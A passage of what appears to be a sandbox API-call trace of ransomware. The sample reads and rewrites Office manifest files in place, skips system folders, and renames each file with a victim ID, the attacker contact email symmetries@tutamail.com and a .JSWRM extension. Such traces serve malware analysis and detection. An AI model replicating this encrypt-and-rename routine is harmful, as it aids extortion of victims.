Office\\root\\Integration\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.accessmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.537] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=59164) returned 1 [0101.537] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe710) returned 0x24d210 [0101.537] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0xe710, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0xe710, lpOverlapped=0x0) returned 1 [0101.541] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.541] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xe710, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0xe710, lpOverlapped=0x0) returned 1 [0101.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.542] CloseHandle (hObject=0x45c) returned 1 [0101.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0101.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0101.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0101.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0101.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0101.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0101.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.542] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.accessmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.accessmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.accessmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0101.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0101.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0101.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.543] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2daddbf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2daddbf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd31d9ff6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.accessmuiset.msi.16.en-us.xml", cAlternateFileName="C2FB2E~1.XML")) returned 1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2=".") returned 1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="..") returned 1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="...") returned 1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.543] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0101.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.accessmuiset.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0101.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.accessmuiset.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.accessmuiset.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 41 [0101.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0101.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0101.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.accessmuiset.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0101.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.accessmuiset.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.accessmuiset.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 41 [0101.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0101.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0101.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0101.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.544] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2042) returned 1 [0101.544] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7f0) returned 0x20c6c0 [0101.544] ReadFile (in: hFile=0x45c, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345ec04*=0x7f0, lpOverlapped=0x0) returned 1 [0101.546] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.546] WriteFile (in: hFile=0x45c, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345ec00*=0x7f0, lpOverlapped=0x0) returned 1 [0101.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0101.546] CloseHandle (hObject=0x45c) returned 1 [0101.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0101.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0101.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0101.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0101.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0101.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.547] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.accessmuiset.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.accessmuiset.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0101.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.548] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd23fe538, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd23fe538, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd26f9444, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3f14, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~4.XML")) returned 1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.548] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0101.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0101.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cchWideChar=44, lpMultiByteStr=0x22d0a0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 44 [0101.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0101.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0101.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0101.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 44 [0101.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0101.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0101.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0101.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0101.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.549] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=16148) returned 1 [0101.549] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3f10) returned 0x24d210 [0101.549] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3f10, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x3f10, lpOverlapped=0x0) returned 1 [0101.552] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.552] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3f10, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x3f10, lpOverlapped=0x0) returned 1 [0101.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.553] CloseHandle (hObject=0x45c) returned 1 [0101.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0101.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0101.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0101.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0101.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0101.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.553] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0101.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0101.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.554] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2dfa2a2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2dfa2a2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd31415cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x265a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.dcfmui.msi.16.en-us.xml", cAlternateFileName="C206B0~1.XML")) returned 1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.554] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.dcfmui.msi.16.en-us.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.dcfmui.msi.16.en-us.xml", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.dcfmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 35 [0101.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0101.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.dcfmui.msi.16.en-us.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.dcfmui.msi.16.en-us.xml", 